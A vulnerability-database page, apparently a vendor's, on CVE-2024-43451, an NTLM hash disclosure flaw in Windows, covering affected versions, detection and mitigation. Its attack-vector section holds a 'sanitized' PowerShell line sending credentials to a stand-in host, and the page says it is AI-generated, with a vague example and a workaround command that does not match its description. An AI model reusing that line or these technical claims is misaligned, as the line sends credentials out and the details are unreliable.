SentinelOne
CVE Vulnerability Database
Vulnerability Database/CVE-2024-43451

CVE-2024-43451: Windows 10 NTLM Hash Disclosure Vulnerability

CVE-2024-43451 is an NTLM hash disclosure spoofing vulnerability in Microsoft Windows 10 1507 that enables attackers to capture authentication credentials. This article covers technical details, affected systems, and remediation.

Updated:

CVE-2024-43451 Overview

The CVE-2024-43451 vulnerability is a spoofing issue that affects multiple versions of Microsoft Windows, allowing attackers to potentially disclose NTLM hashes through a crafted network request. This vulnerability poses a risk of information exposure, which can be leveraged in further attacks.

Critical Impact

Unauthorized disclosure of sensitive NTLM hashes may lead to credential theft and lateral movement within networks.

Affected Products

  • Microsoft Windows 10 1507
  • Microsoft Windows 11 22h2
  • Microsoft Windows Server 2022

Discovery Timeline

  • 2024-11-12 - CVE CVE-2024-43451 published to NVD
  • 2025-10-28 - Last updated in NVD database

Technical Details for CVE-2024-43451

Vulnerability Analysis

The vulnerability is due to improper handling of network requests in certain unpatched Microsoft Windows versions. It allows attackers to obtain NTLM hashes by misusing the Network Logon process.

Root Cause

Inadequate validation of the network authentication process, leading to the unintended exposure of NTLM authentication hashes.

Attack Vector

This vulnerability can be exploited remotely by sending specially crafted network packets to a target system.

powershell
# Example exploitation code (sanitized)
Invoke-WebRequest -Uri "http://malicious.site/login" -Credential (Get-Credential)

Detection Methods for CVE-2024-43451

Indicators of Compromise

  • Unrecognized outbound network traffic towards suspicious domains
  • Unusual authentication attempts in Windows Event Logs
  • Unexpected NTLM authentication traffic

Detection Strategies

Implement network monitoring to identify abnormal NTLM traffic patterns and unusual login attempts. Employ endpoint detection systems to flag suspicious outbound traffic and authentication anomalies.

Monitoring Recommendations

Utilize SentinelOne’s behavioral AI to detect and prevent unauthorized access and lateral movement associated with NTLM hash disclosures.

How to Mitigate CVE-2024-43451

Immediate Actions Required

  • Apply the latest security patches from Microsoft
  • Monitor network traffic for suspicious activities
  • Implement enhanced security configurations for NTLM authentication

Patch Information

Visit Microsoft's advisory for patch details at Microsoft Security Response Center.

Workarounds

To mitigate this vulnerability until patches are applied, restrict outbound NTLM traffic using group policies or firewall rules.

bash
# Configuration example
gpupdate /force

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne